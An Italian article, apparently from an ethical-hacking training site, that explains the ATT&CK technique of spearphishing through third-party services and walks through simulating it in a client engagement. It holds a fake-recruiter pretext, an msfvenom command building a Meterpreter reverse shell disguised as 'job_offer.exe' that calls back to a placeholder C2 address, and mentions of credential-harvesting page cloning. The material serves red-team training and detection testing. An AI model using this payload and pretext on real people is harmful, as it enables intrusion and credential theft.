Phishing via Servizi Terzi: Spearphishing via Service (T1566.003)

Lo spearphishing via service rappresenta una variante insidiosa del phishing mirato in cui l'avversario non utilizza i canali e-mail aziendali, bensì piattaforme di terze parti — social network, webmail personali, app di messaggistica istantanea — per raggiungere la vittima. La tecnica si inserisce nella fase di Initial Access (TA0001), ossia il momento in cui l'attaccante tenta di ottenere un primo punto d'appoggio all'interno della rete bersaglio.

Il meccanismo è tanto semplice quanto efficace: l'avversario costruisce un profilo credibile su LinkedIn, Facebook, WhatsApp o Telegram, avvia una conversazione con il target, stabilisce un rapporto di fiducia e poi veicola un link malevolo o un allegato attraverso quel canale. Il vantaggio operativo è duplice. Da un lato, i servizi di terze parti applicano policy di sicurezza meno restrittive rispetto ai gateway e-mail aziendali; dall'altro, il contenuto arriva in un contesto che la vittima percepisce come informale e affidabile, aumentando la probabilità di apertura.

I numeri confermano la popolarità di questo vettore: 14 gruppi APT documentati, 1 campagna formalizzata, 1 software distribuito attraverso questo canale e 5 mitigazioni raccomandate. Dalla proposta di finti colloqui di lavoro su LinkedIn all'invio di loader compressi via Telegram, le declinazioni operative coprono uno spettro ampio di piattaforme e pretesti.

La simulazione di questa tecnica in ambiente controllato richiede la costruzione di un'infrastruttura social engineering credibile e la verifica della capacità dell'organizzazione di intercettare payload consegnati attraverso canali non convenzionali. Il fulcro dell'esercizio non è il payload in sé — che può essere un semplice callback beacon — ma il vettore di consegna: messaggio diretto su piattaforma social, allegato via webmail personale, archivio inviato tramite app di messaggistica.

Preparazione del profilo e del pretesto. Crea un account LinkedIn o un profilo di messaggistica dedicato all'engagement. L'approccio più replicato in campagne reali è l'offerta lavorativa fittizia: un recruiter di una società di consulenza che propone una posizione attraente è un pretesto che giustifica domande su tecnologie interne, software in uso e organigrammi.

Generazione del payload. Per il callback iniziale, GoPhish (open source) consente di orchestrare campagne di phishing con tracking granulare e funziona perfettamente anche per simulare link malevoli distribuiti via servizi esterni. In alternativa, per un test di esecuzione, un payload generato con msfvenom di Metasploit Framework (open source) offre flessibilità:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP_C2> LPORT=443 -f exe -o job_offer.exe

Comprimi il binario in un archivio ZIP protetto da password, esattamente come documentato per ToddyCat, che ha distribuito il loader di Ninja in archivi ZIP via Telegram.

Consegna via canale terzo. Invia il pacchetto attraverso il canale concordato con il cliente — messaggio diretto LinkedIn, allegato WhatsApp, condivisione Dropbox con notifica e-mail. Quest'ultimo scenario replica il comportamento di EXOTIC LILY, che sfruttava le notifiche native di servizi di file sharing legittimi per aggirare i filtri di posta.

Verifica della detection. Dopo l'apertura del payload, controlla se il SOC rileva la catena di esecuzione anomala: il browser o il client di messaggistica che scrive un file in una directory di download, seguito dall'avvio di un processo figlio inatteso. Su Windows, Sysmon (open source) con una configurazione adeguata registra questa genealogia in modo dettagliato.

Per la componente social engineering pura — senza esecuzione di codice — lo strumento Social Engineering Toolkit, SET (open source), offre moduli per la clonazione di pagine di login e la generazione di link di credential harvesting, utili a testare la reattività degli utenti di fronte a messaggi ricevuti fuori dal perimetro aziendale.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo